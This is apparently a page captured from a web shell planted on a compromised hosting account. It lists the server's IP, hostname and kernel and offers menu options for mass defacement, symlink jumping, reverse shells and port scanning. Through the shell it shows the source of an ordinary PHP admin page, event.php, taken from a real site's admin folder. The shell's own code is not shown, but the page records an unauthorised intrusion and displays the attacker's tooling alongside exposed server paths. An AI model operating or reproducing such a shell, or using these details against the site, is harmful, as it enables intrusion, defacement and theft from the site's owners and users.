Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
emprendo.com.co
/
public_html
/
resplandor
/
admin
/
Viewing: event.php
<?php include("include/header.php"); if(!isset($_SESSION['loggedUserId'])) { echo "<script> window.location.href = '../login.php';</script>"; } ?> <!-- Page Content --> <div id="content" class="p-4 p-md-5 pt-5"> <h2 class="mb-4">Events Halls</h2> <!-- Button trigger modal --> <button type="button" class="btn btn-dark" id="addEventBtn"> + Add New Event Hall </button> <!-- Modal --> <div class="modal fade" id="addModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Add Event Hall</h5> <button type="button" class="close" data-bs-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form action="admin_functions.php" method="POST" id="modal-addEvent" autocomplete="off"> <?php $query_eventType = "select * from event_type where Status = 'active' order by EventTypeId"; $result = mysqli_query($con,$query_eventType); ?> <div class="input-group col-lg-11 ml-3 mb-4"> <div class="input-group-prepend"> <span class="input-group-text bg-white px-4 border-md border-right-0"> <i class="fa fa-black-tie text-muted"></i> </span> </div> <select id="eventType" name="eventType" class="form-control custom-select bg-white border-left-0 border-md" required> <option disabled="" selected="">choose a event type</option> <?php while ($row = mysqli_fetch_array($result)) { echo "<option value='".$row['EventTypeId']."'>".$row['EventType']."</option>"; } ?> </select> </div> <!-- Event Number --> <div class="input-group col-lg-11 ml-3 mb-4"> <div class="input-group-prepend"> <span class="input-group-text bg-white px-4 border-md border-right-0"> <i class="fa fa-user text-muted"></i> </span> </div> <input id="eventNumber" type="text" name="hallNumber" placeholder="Event Number" class="form-control bg-white border-left-0 border-md" required> </div> <div class="modal-footer"> <button type="submit" class="btn btn-primary">Add</button> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button> </div> </form> </div> </div> </div> </div> <!--Edit Modal --> <div class="modal fade" id="updateModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Edit Details</h5> <button type="button" class="close" data-bs-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form action="admin_functions.php" method="POST" id="modal-updateEvent" autocomplete="off"> <?php $query_eventType = "select * from event_type where Status = 'active' order by EventTypeId"; $result = mysqli_query($con,$query_eventType); ?> <div class="input-group col-lg-11 ml-3 mb-4"> <div class="input-group-prepend"> <span class="input-group-text bg-white px-4 border-md border-right-0"> <i class="fa fa-black-tie text-muted"></i> </span> </div> <select id="editEventType" name="editEventType" class="form-control custom-select bg-white border-left-0 border-md" required> <option disabled="" selected="">choose a event type</option> <?php while ($row = mysqli_fetch_array($result)) { echo "<option value='".$row['EventTypeId']."'>".$row['EventType']."</option>"; } ?> </select> </div> <!-- Event Number --> <div class="input-group col-lg-11 ml-3 mb-4"> <div class="input-group-prepend"> <span class="input-group-text bg-white px-4 border-md border-right-0"> <i class="fa fa-user text-muted"></i> </span> </div> <input id="editHallNumber" type="text" name="editHallNumber" placeholder="Event Number" class="form-control bg-white border-left-0 border-md" required> </div> <div class="input-group col-lg-11 ml-3 mb-4"> <div class="input-group-prepend"> <span class="input-group-text bg-white px-4 border-md border-right-0"> <i class="fa fa-black-tie text-muted"></i> </span> </div> <select id="editStatus" name="editStatus" class="form-control custom-select bg-white border-left-0 border-md" required> <option disabled="" selected="">choose a status</option> <option value="active">Active</option> <option value="in-active">In-active</option> </select> </div> <!-- for getting the id when the form is submitted --> <input type="hidden" id="updateEventId" name="updateEventId"> <div class="modal-footer"> <button type="submit" class="btn btn-primary">Save</button> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button> </div> </form> </div> </div> </div> </div> <br> <!-- Filter Drop down --> <div class="float-right filterBy"> <select name="category" id="eventFilter" class="form-control custom-select bg-white border-md filter"> <option disabled="" selected="">FilterBy </option> <option value="">All</option> <option value="active">active</option> <option value="in-active">in-active</option> </select> </div> <!-- table for the display the content --> <div class="container-fluid" id="contentArea"> </div> </div> <script src="js/event_function.js" ></script> <?php include("include/footer.php"); ?>
Coded With 💗 by
0x6ick